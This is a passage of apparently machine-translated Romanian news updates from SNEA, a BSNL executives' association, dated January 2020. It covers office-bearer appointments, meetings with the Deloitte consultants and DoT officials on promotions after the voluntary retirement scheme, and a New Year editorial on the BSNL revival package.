    (pentru câteva posturi vacante) și ajutarea conducerii să stopeze implementarea noii politici de promovare. Conducerea nu oferă promovare pe bază de post în numele disprețului și al restructurării și, în același timp, nu implementează noua politică. Toți sunt eligibili pentru promovare începând cu 07/01/18 însă insistă pentru promovare de la o dată posibilă! Oportunitatea pe care am avut-o anul trecut pentru promovarea SDE pentru toate posturile SDE stricate de ei de atitudinea fermă față de petiția de dispreț și cererea de apariție personală a CMD și GM(Pers) în CAT/Ernakulam.

    06-01-2020

    Reuniunea Comitetului Executiv al Cercului Assam Circle a avut loc la Guwahati pe 01.04.2020. GS și Jt Sec(East) au participat și s-au adresat la întâlnire. CEC a cooptat în unanimitate următorii titulari ai Biroului Cercului:

    Președintele Cercului: Com Suresh Bora, AGA.

    Secretar cerc: Com Borun Baruah, JTO.

    Trezorier: Com Allauddin Ahmed, A.O.

    Cooptarea a devenit necesară, deoarece OB-urile anterioare au optat pentru VRS 2019. SNEA le recunoaște contribuția de mulți ani și le urează toate cele bune.

    SNEA CHQ urează tot succes pentru tânăra echipă nou aleasă.

    03-01-2020

    Vizualizați rapoarte media:

    Bharat Sanchar Nigam Limited (BSNL), controlată de stat, continuă să fie la capăt în urma incertitudinilor birocratice care au condus la o erodare a potențialelor oportunități de venituri din spatele programelor de mega conectivitate în valoare de 20.000 de milioane de Rs, în ciuda eforturilor Centrului de a reînvia compania stresată de telecomunicații. .  

    03-01-2020

    03-01-2020

    Interacțiunea cu consultantul M/s Deloitte:

    Conducerea BSNL a aranjat o întâlnire cu Consultantul M/s Deloitte desemnat pentru a oferi recomandări privind continuitatea serviciilor BSNL în scenariul post VRS și măsurile pe termen scurt în data de 01.02.2020.

    GS, Președintele și ambii AGS au avut o discuție detaliată cu consultantul timp de aproximativ două ore de la 1600 la 1800, concentrându-se pe toate problemele care pot apărea în scenariul post VRS. Lipsa acută a consultanților identificată în cadrele DGM, AGM și TT(TM) care va avea impact după VRS.

    Discuțiile s-au concentrat pe realitățile de teren din unitățile de teren, cum va afecta aceasta după VRS, măsuri imediate de luat pentru reducerea impactului, relația cu clienții în scenariul post VRS, fuziunea SSA și Circle, dezavantajul structurii actuale a BA, forța de muncă cerința, motivarea personalului etc etc.

    02-01-2020

    02-01-2020

    GS, Președintele și AGS s-au întâlnit cu Secretarul/DoT, Membru(T)/DoT, Secretar Addl/DoT, CMD, DIR(HR), DIR(Fin), Jt Sec/DoT și alți ofițeri superiori ai DoT la 01.01.2020 , noul an și a purtat scurte discuții. Discuțiile cu CMD și DIR(HR) pe probleme importante precum restructurarea și promovarea sunt fixate pentru săptămâna viitoare din cauza programului lor încărcat.

    În cadrul întâlnirii cu secretarul/DoT am ridicat problema promovării DGM(T) care este oprită din cauza răspunsului dat de/DoT în ședința cu Comisia parlamentară că promovarea DGM poate fi emisă numai după finalizarea restructurării de către secretar (ex. după VRS). Am explicat că toate DE eligibile primesc promovare și nu există nicio rezervare implicată în promovarea DE către DGM și că toate cele 287 DE aparțin categoriei SC/ST fiind acoperite. Dintre DE, mai mult de 500 de DE au aplicat pentru VRS și vor rata promoția dacă aceasta este emisă după 31.01.2020. În continuare, îi aducem la cunoştinţă că la 30.12.2019, chiar şi ofiţerii de grad CGM care se retrag la 31.12.2019 au promovat şi li se permite să beneficieze de promovare. Dar în cazul directorilor BSNL doar se întâmplă invers.

    După discuție, secretarul a informat că este de acord cu promovarea DGM, cu condiția ca: 1) nu are implicații financiare chiar înainte de VRS și 2) nu creează nicio problemă în cadre similare. Am explicat că nu are implicații financiare și toți lucrează la scări superioare și nu va crea nicio problemă în cadre similare, deoarece promovarea DGM este oprită după 2017 din cauza litigiilor.

    Atunci Secretarul ne-a asigurat să discutăm cu CMD și dacă informația este corectă, va da permisiunea pentru promovarea DGM.

    01-01-2020

    01-01-2020

    Editorial

    2019: Perioada tulbure din istoria BSNL. O depășim cu succes cu o Unitate și Solidaritate fără precedent

    Anul Nou dezvăluie noi speranțe cu noi provocări

    În 2019, trecusem prin vremuri tulburi, niciodată martori în istoria BSNL, cu agitații după alta, cerând Reînvierea BSNL. A fost într-adevăr o luptă pentru angajații BSNL. Fiecare membru angajat al SNEA a dedicat întregul an pentru renașterea BSNL, deoarece fiecare executiv al BSNL cu gândire corectă era conștient de faptul că viitorul său depinde pe deplin de viitorul BSNL.

    Da, asistăm la măsuri represive declanșate de conducere și Guvern împotriva Asociațiilor și Sindicatelor pentru a le obliga să oprească agitațiile și luptele, permițând BSNL moartea sa naturală prin acceptarea înfrângerii. Dar nu ne-am cedat niciodată, deoarece am fost făcuți din lucruri diferite, pregătiți pentru orice sacrificiu și gata să luptăm până la capăt, până când ne atingem scopul. Da, a fost o luptă pentru noi toți pe care trebuie să o câștigăm cu orice preț.

    Inițial, Guvernul nu a fost deloc serios cu privire la renașterea BSNL. Toate ministerele s-au opus Planului de renaștere. Guvernul aștepta moartea naturală a BSNL. Ministerul de Finanțe a fost atât de ostil, opunându-se oricărui tip de pachet de renaștere și insistând pentru închiderea BSNL și MTNL. Lupta, cot la cot cu eforturile de succes ale angajaților BSNL de a crea o opinie publică și media în favoarea BSNL Revival a făcut cu adevărat minuni. SNEA a fost în fruntea tuturor acestor activități. Constrângerea creată de noi pentru intervenția politică a funcționat în sfârșit. Eforturile sincere ale Onorului MoC și eforturile sale de a forma GoM cu ministrul de Interne în calitate de președinte, împreună cu eforturile sincere ale ambilor secretari/DoT și ale ambelor CMD/BSNL au făcut ca lucrurile să se întâmple. Eforturile noastre pentru intervenția Onorabilului Prim-ministru și apelul final al Onorabilului Prim-ministru însuși de a oferi un pachet bun de Revival care să ajute cu adevărat la revigorarea BSNL a fost cel mai decisiv factor.

    În cele din urmă, pachetul de revigorare BSNL și MTNL a fost aprobat de către Cabinetul Uniunii la 23.10.2019, dând o nouă viață BSNL și MTNL. Pachetul are potențialul real pentru renașterea BSNL. Taxele pentru spectrul 4G de 14.155 de rupiare plus 18% GST vor fi suportate de guvern, așa cum ne-a cerut. De la început, AUAB a cerut guvernului să aloce spectre 4G gratuite BSNL. Monetizarea terenurilor pentru compensarea datoriilor și îndeplinirea CAPEX-ului a primit și aprobarea Cabinetului. Cererea noastră de asistență financiară sa concretizat și sub forma unei obligațiuni pe termen lung de 10 ani pentru 15.000 Cr pentru BSNL și MTNL cu garanție suverană a Guvernului. Preocuparea noastră pentru fuziunea MTNL cu BSNL, i.e. răspunderea financiară uriașă, statutul său de companie cotată la bursă și problemele complexe de resurse umane sunt abordate înainte ca fuziunea să aibă loc. Întreaga răspundere de aproximativ 15.000 de crori pentru VRS este suportată de Guvern, deoarece ne opuneam oricărei sarcini financiare suplimentare asupra BSNL în numele VRS. Alocarea spectrului 5G este o altă decizie favorită în viitor.

    Fiecare angajat al BSNL, în special Tovarășii SNEA, poate prețui această realizare minunată, creând o altă istorie în mișcarea sindicală. Da Tovarăși, am creat istorie luptându-ne umăr la umăr cu alți angajați, pentru Reînvierea companiei, dând exemplu pentru alte sectoare. Sunt foarte mândru și norocos să fac parte dintr-o astfel de luptă și să conduc o Asociație de membri dedicați, în fruntea luptei pe steagul AUAB, în cea mai grea perioadă. Acestea sunt momentele memorabile din viață.

    Acum suntem la pragul anului 2020 cu multe speranțe și așteptări. Căutăm pozitivitate în BSNL. Reînvierea BSNL este prima dintre ele.

    Lansarea 4G pe baza pan India pe spectrul alocat nu ar trebui să fie amânată. Clienții așteaptă cu nerăbdare acel moment. De asemenea, BSNL răspunde în fața Guvernului și după alocarea spectrului 4G gratuit. Modernizarea rețelei urmează să fie accelerată. Problemele operaționale și compensarea cotizațiilor restante către forța de muncă, antreprenori, vânzători, proprietari de terenuri etc sunt provocările imediate pentru a face orice model de externalizare de succes. BSNL trebuie să recâștige încrederea dintre aceștia prin curățarea cotizațiilor, ceea ce va deschide drumul pentru viitor. Realizarea banilor prin obligațiunile suverane și monetizarea terenurilor sunt două măsuri importante în această direcție. Conducerea trebuie să iasă din sindromul VRS și să înceapă să lucreze la aceste probleme pentru a se asigura că BSNL continuă să ofere servicii neîntrerupte după 31.01.2020. Un număr mare de clienți fideli sunt cu adevărat îngrijorați de pensionarea voluntară masivă și este responsabilitatea noastră să le recâștigăm încrederea în scenariul post VRS. În acest sens, deciziile de management vor fi foarte cruciale.

    Pe lângă problemele de mai sus, modul în care managementul va motiva restul de 47% dintre angajați să preia întreaga sarcină de lucru în situația post VRS, modul în care aceștia umple vidul creat în unitățile de teren care generează venituri etc. impact asupra eforturilor de revigorare a BSNL. Lipsa de directori la nivel superior poate fi satisfăcută cu ușurință prin promovare care se poate face în câteva zile prin noua politică, pur și simplu prin luarea de VC.

    Nu mai pot fi făcute scuze de către DoT/Guvern și conducerea BSNL în numele costului angajaților, deoarece peste 50% angajați au luat VRS, depășindu-și ținta. Am avertizat deja conducerea că o reducere neprofesională și drastică a puterii directorilor va avea un impact negativ asupra revigorării BSNL și că lucrătorii buni vor fi păstrați în BSNL. Totul depinde de modul în care managementul folosește în mod câștigător angajații rămași în scenariul post VRS. O abordare profesională și decizii politice rapide pot aduce din nou BSNL pe drumul cel bun.

    Să sperăm că 2020 va aduce vești bune pentru BSNL și pentru întreaga națiune.